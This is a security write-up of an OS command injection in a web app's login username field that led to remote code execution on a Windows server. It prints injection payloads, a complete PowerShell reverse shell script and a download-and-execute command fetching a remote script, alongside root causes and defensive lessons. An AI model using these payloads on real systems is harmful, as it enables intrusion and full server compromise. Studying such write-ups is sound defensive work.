OS Command Injection to Remote Code Execution

Exploiting OS Command Injection for Remote Code Execution.

Target Background

The target was an asset management web application allowing users to create and manage assets through a centralized portal.

Authentication Mechanisms

The application supported multiple authentication methods:

• Standard username/password login
• Google SSO
• GitHub SSO

Identifying the Attack Vector

Reconnaissance identified the login form as the primary attack surface.

The username field inside the JSON request object was discovered to be vulnerable to OS Command Injection.

Attack Surface Analysis

The application was hosted on a Windows environment which guided payload selection during exploitation.

The application responses returned boolean values:

• true
• false

Due to limited response visibility, out-of-band techniques were used to validate exploitation.

Request

POST /username_exists HTTP/1.1
Host: target.com
Cookie: session cookie: hello
User-Agent: Mozilla/5.0
Content-Type: application/json

{
    "username": "whoami"
}

Response

HTTP/1.1 200 OK
Server: nginx/1.22.1
Content-Type: text/html; charset=utf-8

{
    "success": false
}

Out-of-Band Validation

Several OOB payloads were used during testing:

• ping
• curl
• wget

Timing differences and outbound requests confirmed successful command execution.

Example Payloads

|ping -c 5 127.0.0.1||

|curl https://thevillagehacker.com/exploit/file.txt||

The curl payload successfully downloaded a remote file from an attacker-controlled server, validating the injection vector.

Exploitation

Since the target operated in a Windows environment, a PowerShell reverse shell payload was selected.

This enabled a reverse TCP connection back to the attacker system.

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient(
'10.10.10.10',80);

$stream = $client.GetStream();

[byte[]]$bytes = 0..65535|%{0};

while(($i = $stream.Read(
$bytes, 0, $bytes.Length)) -ne 0){

    $data = (
    New-Object -TypeName
    System.Text.ASCIIEncoding
    ).GetString($bytes,0,$i);

    $sendback = (
    iex ". { $data } 2>&1"
    | Out-String );

    $sendback2 =
    $sendback + 'PS ' +
    (pwd).Path + '> ';

    $sendbyte =
    ([text.encoding]::ASCII)
    .GetBytes($sendback2);

    $stream.Write(
    $sendbyte,
    0,
    $sendbyte.Length
    );

    $stream.Flush()
};

$client.Close()

Final Exploitation Payload

|powershell -c
"IEX(New-Object System.Net.WebClient)
.DownloadString(
'https://thevillagehacker.com/mypowershell.ps1'
)"||

Injecting the above payload established a reverse shell connection to the target server.

The application executed with administrative privileges, resulting in full system compromise.

Impact

• Remote Code Execution
• Full server compromise
• Privilege escalation
• Arbitrary command execution
• Data access and manipulation
• Potential lateral movement

Root Cause

• Improper input sanitization
• Unsafe command execution
• Direct OS command concatenation
• Lack of server-side validation
• Excessive application privileges

Conclusion

The exploitation of an OS Command Injection vulnerability inside the authentication workflow resulted in full remote code execution against the target infrastructure.

This case highlights the importance of:

• Strict input validation
• Secure command handling
• Least privilege execution
• Defense-in-depth controls

Reference

• https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Thank you for reading.